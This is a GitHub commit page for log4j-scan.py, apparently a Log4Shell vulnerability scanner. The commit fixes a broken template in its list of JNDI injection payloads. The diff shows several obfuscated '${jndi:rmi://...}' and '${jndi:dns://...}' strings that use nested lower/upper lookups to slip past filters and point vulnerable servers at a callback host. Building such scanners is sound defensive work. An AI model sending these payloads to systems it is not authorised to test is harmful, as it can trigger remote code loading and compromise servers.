Skip to content

Commit

Permalink
Merge pull request fullhunt#35 from swarley7/patch-1
Browse files Browse the repository at this point in the history
Fixed broken template
  • Loading branch information
mazen160 authored Dec 14, 2021
2 parents 38444c5 + 6d05d99 commit cc60f34
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion log4j-scan.py
Original file line number Diff line number Diff line change
Expand Up @@ -53,7 +53,7 @@
"${${::-j}ndi:rmi://{{callback_host}}/{{random}}}",
"${jndi:rmi://{{callback_host}}}",
"${${lower:jndi}:${lower:rmi}://{{callback_Host}}/{{random}}}",
"${${lower:${lower:jndi}}:${lower:rmi}://{{callback_host/{{random}}}",
"${${lower:${lower:jndi}}:${lower:rmi}://{{callback_host}}/{{random}}}",
"${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://{{callback_host}}/{{random}}}",
"${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://{{callback_host}}/{{random}}}",
"${jndi:dns://{{callback_host}}}"]
Expand Down

0 comments on commit cc60f34

Please sign in to comment.